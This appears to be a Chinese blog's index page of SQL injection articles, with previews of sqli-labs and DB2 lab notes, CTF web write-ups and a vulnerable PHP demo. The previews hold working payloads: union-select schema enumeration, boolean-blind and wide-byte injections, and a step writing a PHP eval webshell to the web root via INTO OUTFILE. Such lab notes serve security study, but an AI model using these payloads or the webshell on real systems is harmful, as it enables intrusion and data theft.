SQL注入
文章平均质量分 76
Vi_vids
Web小白,欢迎交流哟
展开
-
DB2数据库注入
db2数据库这里使用的靶场为墨者学院在线靶场确定字段数确定回显位id=-1 union select 1,2,3,4 from syscat.tables查看数据库基本信息/爆库爆表可以使用的表可以是syscat.tables,也可以是syscat.columns、sysibm.sysdummy1科普时间sysibm.sysdummy1 表是DB2数据库中的系统表,存放着系统的相关信息id=-1 union select 1,current schema,current s原创 2021-03-26 22:02:52 · 1329 阅读 · 1 评论 -
sqli-labs靶场笔记(七)
sqli-labsLess-40【】原创 2021-01-03 16:58:27 · 161 阅读 · 0 评论 -
sqli-labs靶场笔记(六)
sqli-labs靶场笔记(六)Less-32【宽字节注入】下面展示一些 payload。id=1%df'and 1=1 %23 //判断注入类型id=1%df'order by 3 %23 //查看属性列个数id=-1%df'union select 1,user(),database() %23 //查看数据库用户、数据库名称iid=-1%df'union select 1,group_concat(0x7e,table_name),3 from information_schema.tab原创 2020-12-22 16:36:14 · 210 阅读 · 1 评论 -
sqli-labs靶场笔记(五)
sqli-labs靶场笔记(五)Less-17原创 2020-12-19 13:03:34 · 176 阅读 · 0 评论 -
sqli-labs靶场笔记(三)
sqli-labs靶场笔记(三)Less-07【木马上传】下面展示一些 步骤。id=1')) order by 3--+ //显示属性为3列id=-1')) union select 1,2,'<?php @eval($_POST["code"]);?>' into outfile 'C:\\software\\phpstudy_pro\\WWW\\love.php'--+ //将一句话木马写入用蚁剑连接love.php即可通关Less-08【Boolean注入】下面展示一些原创 2020-12-08 11:38:05 · 145 阅读 · 0 评论 -
sqli-labs靶场笔记(四)
sqli-labs靶场笔记(四)Less-11判断是否由前端屏蔽,采用更改数据包实现该网站使用POST请求方式,使用Live HTTP header进行注入操作判断username存在注入得到username对应的密码以上payload不仅可以在传输数据包时改包,还可以【以下】Less-12使用单引号直接爆错【没有回显】,尝试使用双引号【回显报错】和Less-11类似,还存在以下payloadLess-13开始先用单引号试水,报错回显该关卡无法使用改包进行Les原创 2020-12-11 17:01:26 · 132 阅读 · 0 评论 -
sqli-labs靶场笔记(二)
sqli-labs靶场笔记(二)Less-05【Boolean 注入】下面展示一些 步骤。id=1' order by 3 --+ //确定属性列id=1' and length(database())=8 --+ //确定数据库名长度为8id=1' and ascii(substr((select database()),1,1))=115 --+ //配合burp得到数据库名id=-1' or exists(select * from information_schema.columns)原创 2020-12-06 20:55:39 · 140 阅读 · 0 评论 -
sqli-labs靶场笔记(一)
sqli-labs靶场笔记(一)Less-01下面展示一些 会用到的payload。id=-1' union select 1,user(),database() --+id=-1' or exist(select * from information_schema_columns) --+id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='secur原创 2020-12-06 16:12:39 · 203 阅读 · 0 评论 -
Web攻防世界(七)
CTF-WebWeb方向(攻防世界——找FLAG)前期在bilibili学习Web知识、基本漏洞原理、burp、正则表达式的用法…(菜鸟第五天)前阵子一些事情耽搁了,补回来补回来!!!Web_php_include题目显示出来就是整串代码通过对其代码的分析,发现该网页可获取两个参数:hello 和 page,另外该php代码还对php://协议进行过滤。所以这里可利用==data://==协议查看当前页面所在目录通过$_SERVER[‘DOCUMNET_ROOT’]获得当前目录为/v原创 2020-11-04 17:46:58 · 143 阅读 · 0 评论 -
SQL注入(数字型)
基本漏洞篇SQL注入(数字型)SQL注入就是在网站中注入sql语句,使其可以显示一些有用敏感信息本章描述的数字型即是注入点为数字,采用GET方式//sql_num.php<?php$conn = mysql_connect('localhost:3306','root','123456')or die('bad!');//$conn定义一个名字为conn的变量//使用账号root密码123456 去连接localhost这个mysql服务mysql_query("SET NAMES原创 2020-10-20 23:37:30 · 1944 阅读 · 0 评论